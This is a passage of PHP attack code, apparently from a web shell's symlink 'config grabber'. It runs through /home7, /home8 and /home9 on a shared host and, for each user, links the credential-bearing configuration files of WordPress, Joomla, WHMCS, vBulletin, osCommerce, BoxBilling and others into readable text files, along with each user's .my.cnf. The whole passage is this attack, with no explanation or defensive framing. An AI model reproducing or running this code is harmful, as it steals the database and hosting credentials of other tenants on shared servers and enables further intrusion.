                                                                    @symlink('/home7/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home7/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home7/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //home 8
                                                                    @symlink('/home8/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home8/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home8/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //home 9
                                                                    @symlink('/home9/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home9/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
